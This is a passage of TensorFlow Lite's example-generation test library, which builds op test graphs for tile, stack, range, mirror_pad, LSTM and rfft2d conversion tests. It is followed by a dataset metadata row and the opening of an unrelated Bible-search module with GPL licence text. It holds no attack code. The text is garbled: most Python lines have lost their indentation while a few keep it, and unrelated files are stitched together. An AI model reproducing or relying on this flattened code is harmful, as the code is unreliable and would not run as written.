"input_shape": [[3, 2, 1], [2, 2, 2]],
"multiplier_dtype": [tf.int32, tf.int64],
"multiplier_shape": [[3]]
}]
def build_graph(parameters):
"""Build the tile op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
shape=parameters["input_shape"],
name="input")
multiplier_value = tf.placeholder(
dtype=parameters["multiplier_dtype"],
shape=parameters["multiplier_shape"],
name="multiplier")
out = tf.tile(input_value, multiplier_value)
return [input_value, multiplier_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
multipliers_value = create_tensor_data(
parameters["multiplier_dtype"],
parameters["multiplier_shape"],
min_value=0)
return [input_value, multipliers_value], sess.run(
outputs,
feed_dict={
inputs[0]: input_value,
inputs[1]: multipliers_value
})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_expand_dims_tests(options):
"""Make a set of tests to do expand_dims."""
test_parameters = [{
"input_type": [tf.float32, tf.int32],
"input_shape": [[5, 4]],
"axis_value": [0, 1, 2, -1, -2, -3],
"constant_axis": [True, False],
}]
  def build_graph(parameters):
    """Build the expand_dims op testing graph."""
inputs = []
input_value = tf.placeholder(
dtype=parameters["input_type"],
name="input",
shape=parameters["input_shape"])
inputs.append(input_value)
if parameters["constant_axis"]:
axis_value = tf.constant(
parameters["axis_value"], dtype=tf.int32, shape=[1])
else:
axis_value = tf.placeholder(dtype=tf.int32, name="axis", shape=[1])
inputs.append(axis_value)
out = tf.expand_dims(input_value, axis=axis_value)
return inputs, [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
input_values.append(
create_tensor_data(parameters["input_type"], parameters["input_shape"]))
if not parameters["constant_axis"]:
input_values.append(np.array([parameters["axis_value"]], dtype=np.int32))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_sparse_to_dense_tests(options):
"""Make a set of tests to do sparse to dense."""
test_parameters = [{
"value_dtype": [tf.float32, tf.int32, tf.int64],
"index_dtype": [tf.int32, tf.int64],
"value_count": [1, 3, 6, 8],
"dense_shape": [[15], [3, 10], [4, 4, 4, 4], [7, 10, 9]],
"default_value": [0, -1],
"value_is_scalar": [True, False],
}]
# Return a single value for 1-D dense shape, but a tuple for other shapes.
def generate_index(dense_shape):
if len(dense_shape) == 1:
return np.random.randint(dense_shape[0])
else:
index = []
for shape in dense_shape:
index.append(np.random.randint(shape))
return tuple(index)
def build_graph(parameters):
"""Build the sparse_to_dense op testing graph."""
dense_shape = parameters["dense_shape"]
    # Special handling for the value_is_scalar case; value_count must be 1.
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
value = tf.placeholder(
name="value", dtype=parameters["value_dtype"], shape=())
else:
value = tf.placeholder(
name="value",
dtype=parameters["value_dtype"],
shape=[parameters["value_count"]])
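    # Draw random indices into a set so every generated index is unique.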
indices = set()
while len(indices) < parameters["value_count"]:
indices.add(generate_index(dense_shape))
indices = tf.constant(tuple(indices), dtype=parameters["index_dtype"])
# TODO(renjieliu): Add test for validate_indices case.
out = tf.sparse_to_dense(
indices,
dense_shape,
value,
parameters["default_value"],
validate_indices=False)
return [value], [out]
def build_inputs(parameters, sess, inputs, outputs):
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
input_value = create_scalar_data(parameters["value_dtype"])
else:
input_value = create_tensor_data(parameters["value_dtype"],
[parameters["value_count"]])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_pack_tests(options):
"""Make a set of tests to do stack."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [1, 2, 3, 4, 5, 6],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
},
{
"dtype": [tf.int32],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [6],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
},
{
"dtype": [tf.int64],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [5],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
}
]
  def get_shape(parameters):
    """Return 'base_shape' with dimension 'axis' grown by 'additional_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
if axis < len(shape):
shape[axis] += parameters["additional_shape"]
return shape
def build_graph(parameters):
all_tensors = []
for n in range(0, parameters["num_tensors"]):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name=("input%d" % n),
shape=get_shape(parameters))
all_tensors.append(input_tensor)
out = tf.stack(all_tensors, parameters["axis"])
return all_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
all_values = []
for _ in range(0, parameters["num_tensors"]):
input_values = create_tensor_data(np.float32, get_shape(parameters))
all_values.append(input_values)
return all_values, sess.run(
outputs, feed_dict=dict(zip(inputs, all_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=72)
@register_make_test_function()
def make_unpack_tests(options):
"""Make a set of tests to do unstack."""
test_parameters = [{
"base_shape": [[3, 4, 3], [3, 4], [5, 6, 7, 8]],
"axis": [0, 1, 2, 3],
}]
  def get_valid_axis(parameters):
    """Clamp 'axis' so it is a valid axis for 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
while axis > len(shape) - 1:
axis -= 1
return axis
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name=("input"), shape=parameters["base_shape"])
outs = tf.unstack(input_tensor, axis=get_valid_axis(parameters))
return [input_tensor], [outs[0]]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(np.float32, shape=parameters["base_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_range_tests(options):
"""Make a set of tests to do range."""
test_parameters = [{
"dtype": [tf.int32, tf.float32],
"offset": [10, 100, 1000],
"delta": [1, 2, 3, 4, -1, -2, -3, -4],
}]
def build_graph(parameters):
"""Build the range op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"], name=("start"), shape=[])
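    # Flip the sign of the offset for negative deltas so the range is
    # non-empty.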
if parameters["delta"] < 0:
offset = parameters["offset"] * -1
else:
offset = parameters["offset"]
delta = parameters["delta"]
limit_tensor = input_tensor + offset
delta_tensor = tf.constant(delta, dtype=parameters["dtype"])
out = tf.range(input_tensor, limit_tensor, delta_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_scalar_data(parameters["dtype"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_fill_tests(options):
"""Make a set of tests to do fill."""
test_parameters = [{
"dims_dtype": [tf.int32, tf.int64],
"dims_shape": [[], [1], [3], [3, 3]],
"value_dtype": [tf.int32, tf.int64, tf.float32],
}]
def build_graph(parameters):
"""Build the fill op testing graph."""
input1 = tf.placeholder(
dtype=parameters["dims_dtype"],
name="dims",
shape=parameters["dims_shape"])
input2 = tf.placeholder(
dtype=parameters["value_dtype"], name="value", shape=[])
out = tf.fill(input1, input2)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input1 = create_tensor_data(parameters["dims_dtype"],
parameters["dims_shape"], 1)
input2 = create_scalar_data(parameters["value_dtype"])
return [input1, input2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input1, input2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
def _make_logical_tests(op):
"""Make a set of tests to do logical operations."""
def logical(options, expected_tf_failures=0):
"""Generate examples."""
test_parameters = [{
"input_shape_pair": [([], []), ([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the logical testing graph."""
input_value1 = tf.placeholder(
dtype=tf.bool, name="input1", shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=tf.bool, name="input2", shape=parameters["input_shape_pair"][1])
out = op(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return logical
@register_make_test_function()
def make_logical_or_tests(options):
"""Make a set of tests to do logical_or."""
return _make_logical_tests(tf.logical_or)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_and_tests(options):
"""Make a set of tests to do logical_and."""
return _make_logical_tests(tf.logical_and)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_xor_tests(options):
"""Make a set of tests to do logical_xor.
Test logical_not as well.
"""
return _make_logical_tests(tf.logical_xor)(options, expected_tf_failures=1)
@register_make_test_function()
def make_mirror_pad_tests(options):
"""Make a set of tests to do mirror_pad."""
test_parameters = [
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [1, 1]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["REFLECT"],
"type": ["placeholder"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["SYMMETRIC"],
"type": ["const"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[3, 2, 4, 5]],
"padding_matrix": [[[1, 1], [2, 2], [1, 1], [1, 1]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.int32, name="input", shape=parameters["input_shape"])
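    # The padding matrix is either fed at runtime or baked in as a constant,
    # depending on the "type" parameter.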
if parameters["type"] != "const":
padding_matrix = tf.placeholder(
dtype=tf.int32,
name="padding",
shape=[len(parameters["input_shape"]), 2])
input_tensors = [input_tensor, padding_matrix]
else:
padding_matrix = tf.constant(np.array(parameters["padding_matrix"]))
input_tensors = [input_tensor]
output = tf.pad(
input_tensor, paddings=padding_matrix, mode=parameters["mode"])
return input_tensors, [output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = [create_tensor_data(tf.int32, parameters["input_shape"])]
if parameters["type"] != "const":
input_values.append(np.array(parameters["padding_matrix"]))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_unroll_batch_matmul_tests(options):
"""Make a set of tests to test unroll_batch_matmul."""
  # The test cases below require broadcasting support (BatchMatMulV2
  # semantics), which isn't supported as of this change.
broadcast_shape_params = [
# Simple broadcast.
[(1, 2, 3), (3, 5), False, False],
# Empty batch broadcast.
[(2, 5, 3), (3, 7), False, False],
# Single batch with non-empty batch broadcast.
[(1, 5, 3), (4, 3, 7), False, False],
# Broadcast both operands
[(3, 1, 5, 3), (1, 4, 3, 7), False, False],
]
test_parameters = [{
"dtype": [tf.float32],
"shape": [
[(2, 2, 3), (2, 3, 2), False, False],
[(2, 2, 3), (2, 3, 2), True, True],
[(2, 2, 3), (2, 2, 3), False, True],
[(2, 2, 3), (2, 2, 3), True, False],
[(4, 2, 2, 3), (4, 2, 3, 2), False, False],
[(4, 2, 2, 3), (4, 2, 3, 2), True, True],
[(4, 2, 2, 3), (4, 2, 2, 3), False, True],
[(4, 2, 2, 3), (4, 2, 2, 3), True, False]
] + broadcast_shape_params,
# TODO(b/130887442): Improve the forward compatibility tests for every
# ops.
"forward_compatibility_test": [False, True],
}]
def build_graph(parameters):
"""Build the batch_matmul op testing graph."""
def _build_graph():
input_tensor1 = tf.placeholder(
dtype=parameters["dtype"], shape=parameters["shape"][0])
input_tensor2 = tf.placeholder(
dtype=parameters["dtype"], shape=parameters["shape"][1])
# Should be unrolled and replaced with fully_connected ops in the end.
out = tf.matmul(
input_tensor1,
input_tensor2,
transpose_a=parameters["shape"][2],
transpose_b=parameters["shape"][3])
return [input_tensor1, input_tensor2], [out]
if parameters["forward_compatibility_test"]:
# This is hardcoded to the date after MatMulV2 is activated.
# TODO(b/130887442): Improve the forward compatibility tests for every
# ops, and remove the hardcoded date.
with tf.compat.forward_compatibility_horizon(2019, 4, 26):
return _build_graph()
else:
return _build_graph()
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(
parameters["dtype"], shape=parameters["shape"][0])
input_value2 = create_tensor_data(
parameters["dtype"], shape=parameters["shape"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_placeholder_with_default_tests(options):
"""Make a set of tests to test placeholder_with_default."""
test_parameters = [{
"dtype": [tf.float32, tf.int32, tf.int64],
}]
def build_graph(parameters):
"""Build the placeholder_with_default testing graph."""
const_node = tf.constant(
[1, 2, 2, 0], shape=[2, 2], dtype=parameters["dtype"])
input_tensor = tf.placeholder_with_default(
const_node, shape=[2, 2], name="input")
out = tf.equal(input_tensor, const_node, name="output")
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
numpy_type = _TF_TYPE_INFO[parameters["dtype"]][0]
input_value = np.array([[1, 0], [2, 1]], numpy_type)
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_unique_tests(options):
"""Make a set of tests for Unique op."""
test_parameters = [
{
"input_shape": [[1]],
"index_type": [tf.int32, tf.int64, None],
"input_values": [3]
},
{
"input_shape": [[5]],
"index_type": [tf.int32, tf.int64],
"input_values": [[3, 2, 1, 2, 3]]
},
{
"input_shape": [[7]],
"index_type": [tf.int32, tf.int64],
"input_values": [[1, 1, 1, 1, 1, 1, 1]]
},
{
"input_shape": [[5]],
"index_type": [tf.int32, tf.int64],
"input_values": [[3, 2, 1, 0, -1]]
}]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.int32, name="input", shape=parameters["input_shape"])
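    # tf.unique's index dtype defaults to tf.int32 when index_type is None.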
if parameters["index_type"] is None:
output = tf.unique(input_tensor)
else:
output = tf.unique(input_tensor, parameters["index_type"])
return [input_tensor], output
def build_inputs(parameters, sess, inputs, outputs):
input_values = [create_tensor_data(tf.int32, parameters["input_shape"])]
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reverse_v2_tests(options):
"""Make a set of tests to do reverse_v2."""
test_parameters = [{
"base_shape": [[3, 4, 3], [3, 4], [5, 6, 7, 8]],
"axis": [0, 1, 2, 3],
}]
  def get_valid_axis(parameters):
    """Clamp 'axis' so it is a valid axis for 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
while axis > len(shape) - 1:
axis -= 1
return axis
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name=("input"), shape=parameters["base_shape"])
outs = tf.reverse(input_tensor, axis=[get_valid_axis(parameters)])
return [input_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(np.float32, shape=parameters["base_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reverse_sequence_tests(options):
"""Make a set of tests to do reverse_sequence."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[8, 4, 5, 5, 6], [4, 4, 3, 5]],
"seq_lengths": [[2, 2, 2, 2], [2, 1, 1, 0]],
"seq_axis": [0, 3],
"batch_axis": [1]
},
{
"input_dtype": [tf.float32],
"input_shape": [[2, 4, 5, 5, 6]],
"seq_lengths": [[2, 1]],
"seq_axis": [2],
"batch_axis": [0]
},
{
"input_dtype": [tf.float32],
"input_shape": [[4, 2]],
"seq_lengths": [[3, 1]],
"seq_axis": [0],
"batch_axis": [1]
}]
def build_graph(parameters):
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
outs = tf.reverse_sequence(
input_value,
seq_lengths=parameters["seq_lengths"],
batch_axis=parameters["batch_axis"],
seq_axis=parameters["seq_axis"])
return [input_value], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_matrix_diag_tests(options):
"""Make a set of tests for tf.linalg.diag op."""
test_parameters = [
{
"input_shape": [[3], [2, 3], [3, 4, 5], [2, 4, 6, 8]],
"input_dtype": [tf.int32, tf.float32],
},
]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
outs = tf.matrix_diag(input_tensor)
return [input_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_matrix_set_diag_tests(options):
"""Make a set of tests for tf.linalg.set_diag op."""
test_parameters = [
{
"input_diag_shapes": [([3, 3], [3]), ([2, 3], [2]), ([2, 4, 4],
[2, 4]),
([3, 4, 5, 6], [3, 4, 5])],
"input_dtype": [tf.int32, tf.float32, tf.uint8],
},
]
def build_graph(parameters):
input_shape = parameters["input_diag_shapes"][0]
diag_shape = parameters["input_diag_shapes"][1]
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"], name="input", shape=input_shape)
diag_tensor = tf.placeholder(
dtype=parameters["input_dtype"], name="diagonal", shape=diag_shape)
outs = tf.matrix_set_diag(input_tensor, diag_tensor)
return [input_tensor, diag_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_shape = parameters["input_diag_shapes"][0]
diag_shape = parameters["input_diag_shapes"][1]
input_values = create_tensor_data(parameters["input_dtype"], input_shape)
diag_values = create_tensor_data(parameters["input_dtype"], diag_shape)
return [input_values, diag_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values, diag_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_eye_tests(options):
"""Make a set of tests for tf.eye op."""
test_parameters = [{
"num_rows_shape": [[]],
"num_cols_shape": [[]],
"batch_shape": [[3], [2, 4], [4, 5, 6], None],
"use_num_cols": [True, False],
"dtype": [tf.float32, tf.int32],
}]
def build_graph(parameters):
input_tensor0 = tf.placeholder(
dtype=tf.int32, name="num_rows", shape=parameters["num_rows_shape"])
input_tensor1 = tf.placeholder(
dtype=tf.int32, name="num_columns", shape=parameters["num_cols_shape"])
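    # num_columns and batch_shape are only used when use_num_cols is set;
    # otherwise a square identity matrix is built from num_rows alone.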
if parameters["use_num_cols"]:
outs = tf.eye(
num_rows=input_tensor0,
num_columns=input_tensor1,
batch_shape=parameters["batch_shape"],
dtype=parameters["dtype"])
return [input_tensor0, input_tensor1], [outs]
else:
outs = tf.eye(num_rows=input_tensor0, dtype=parameters["dtype"])
return [input_tensor0], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value0 = create_scalar_data(dtype=np.int32, min_value=1)
input_value1 = create_scalar_data(dtype=np.int32, min_value=1)
if parameters["use_num_cols"]:
return [input_value0, input_value1], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value0, input_value1])))
else:
return [input_value0], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value0])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function(name="make_unidirectional_sequence_lstm_tests")
@test_util.enable_control_flow_v2
def make_unidirectional_sequence_lstm_tests(options):
"""Make a set of tests to do unidirectional_sequence_lstm."""
test_parameters = [{
"batch_size": [2, 4, 6],
"seq_length": [1, 3],
"units": [4, 5],
"use_peepholes": [False, True],
"is_dynamic_rnn": [False, True]
}]
def build_graph(parameters):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = tf.placeholder(dtype=tf.float32, name="input", shape=shape)
input_values.append(input_value)
lstm_cell = tf.lite.experimental.nn.TFLiteLSTMCell(
parameters["units"],
use_peepholes=parameters["use_peepholes"])
outs, _ = tf.lite.experimental.nn.dynamic_rnn(
lstm_cell, input_value, dtype=tf.float32, time_major=True)
outs = tf.unstack(outs, axis=1)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = tf.placeholder(
dtype=tf.float32, name=("input_%d" % i), shape=shape)
input_values.append(input_value)
lstm_cell = tf.lite.experimental.nn.TFLiteLSTMCell(
parameters["units"], use_peepholes=parameters["use_peepholes"])
outs, _ = tf.nn.static_rnn(lstm_cell, input_values, dtype=tf.float32)
real_output = tf.zeros([1], dtype=tf.float32) + outs[-1]
return input_values, [real_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
init = tf.global_variables_initializer()
sess.run(init)
    # The TFLite fused kernel takes input as [time, batch, input].
    # For the static unidirectional sequence LSTM, the input is a list of
    # length `time` that gets packed together; however, for time = 1 the
    # input is not packed.
tflite_input_values = input_values
if not parameters["is_dynamic_rnn"] and parameters["seq_length"] == 1:
tflite_input_values = [
input_values[0].reshape((1, parameters["batch_size"],
parameters["units"]))
]
return tflite_input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function(name="make_unidirectional_sequence_rnn_tests")
@test_util.enable_control_flow_v2
def make_unidirectional_sequence_rnn_tests(options):
"""Make a set of tests to do unidirectional_sequence_rnn."""
test_parameters = [{
"batch_size": [2, 4, 6],
"seq_length": [1, 3],
"units": [4, 5],
"is_dynamic_rnn": [False, True]
}]
def build_graph(parameters):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = tf.placeholder(dtype=tf.float32, name="input", shape=shape)
input_values.append(input_value)
rnn_cell = tf.lite.experimental.nn.TfLiteRNNCell(parameters["units"])
outs, _ = tf.lite.experimental.nn.dynamic_rnn(
rnn_cell, input_value, dtype=tf.float32, time_major=True)
outs = tf.unstack(outs, axis=1)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = tf.placeholder(
dtype=tf.float32, name=("input_%d" % i), shape=shape)
input_values.append(input_value)
rnn_cell = tf.lite.experimental.nn.TfLiteRNNCell(parameters["units"])
outs, _ = tf.nn.static_rnn(rnn_cell, input_values, dtype=tf.float32)
real_output = tf.zeros([1], dtype=tf.float32) + outs[-1]
return input_values, [real_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
init = tf.global_variables_initializer()
sess.run(init)
    # The TFLite fused kernel takes input as [time, batch, input].
    # For the static unidirectional sequence RNN, the input is a list of
    # length `time` that gets packed together; however, for time = 1 the
    # input is not packed.
tflite_input_values = input_values
if not parameters["is_dynamic_rnn"] and parameters["seq_length"] == 1:
tflite_input_values = [
input_values[0].reshape((1, parameters["batch_size"],
parameters["units"]))
]
return tflite_input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_unfused_gru_tests(options):
"""Make a set of tests for unfused gru op."""
test_parameters = [{
"units": [2, 5],
"batch_size": [1, 2],
"time": [3],
}]
def build_graph(parameters):
inputs = [
tf.placeholder(tf.float32,
[parameters["batch_size"], parameters["units"]])
for _ in range(parameters["time"])
]
cell_fw = tf.nn.rnn_cell.GRUCell(parameters["units"])
cell_bw = tf.nn.rnn_cell.GRUCell(parameters["units"])
outputs, _, _ = tf.nn.static_bidirectional_rnn(
cell_fw, cell_bw, inputs, dtype=tf.float32)
return inputs, outputs
def build_inputs(parameters, sess, inputs, outputs):
input_values = [
create_tensor_data(tf.float32,
[parameters["batch_size"], parameters["units"]])
for _ in range(parameters["time"])
]
init = tf.global_variables_initializer()
sess.run(init)
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_rfft2d_tests(options):
"""Make a set of tests to do rfft2d."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[8, 8], [3, 8, 8]],
"fft_length": [
None, [4, 4], [4, 8], [8, 4], [8, 8], [8, 16], [16, 8], [16, 16]
]
}]
def build_graph(parameters):
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
with spectral_ops_test_util.fft_kernel_label_map():
outs = tf.signal.rfft2d(input_value, fft_length=parameters["fft_length"])
return [input_value], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
extra_toco_options = ExtraTocoOptions()
extra_toco_options.allow_custom_ops = True
make_zip_of_tests(options, test_parameters, build_graph, build_inputs,
extra_toco_options)
# Toco binary path provided by the generate rule.
bin_path = None
def generate_examples(options):
global bin_path
def mkdir_if_not_exist(x):
if not os.path.isdir(x):
os.mkdir(x)
if not os.path.isdir(x):
raise RuntimeError("Failed to create dir %r" % x)
opstest_path = os.path.join(options.output_path)
mkdir_if_not_exist(opstest_path)
out = options.zip_to_output
bin_path = options.toco
# Some zip filenames contain a postfix identifying the conversion mode. The
# list of valid conversion modes is defined in
# generated_test_conversion_modes() in build_def.bzl.
test_function = ("make_%s_tests" % (out.replace(".zip", "").replace(
"pb2lite", "").replace("toco-flex", "").rstrip("_")))
if test_function not in _MAKE_TEST_FUNCTIONS_MAP:
raise RuntimeError("Can't find a test function to create %r. Tried %r" %
(out, test_function))
_MAKE_TEST_FUNCTIONS_MAP[test_function](options)
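# A small illustrative helper (an assumption, not part of the original file):
# it replicates the name mangling generate_examples() uses above to map a zip
# file name to a registered test function, e.g. "conv_toco-flex.zip" maps to
# "make_conv_tests" and "fully_connected_pb2lite.zip" to
# "make_fully_connected_tests".
def _example_test_function_name(zip_name):
  stripped = (zip_name.replace(".zip", "").replace("pb2lite", "")
              .replace("toco-flex", "").rstrip("_"))
  return "make_%s_tests" % stripped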
|
alsrgv/tensorflow
|
tensorflow/lite/testing/generate_examples_lib.py
|
Python
|
apache-2.0
| 176,619 | 0.005588 |
#!/usr/bin/env python
# vim: sw=4:ts=4:sts=4:fdm=indent:fdl=0:
# -*- coding: UTF8 -*-
#
# A sword KJV indexed search module.
# Copyright (C) 2012 Josiah Gordon <josiahg@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
copying_str = \
'''
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
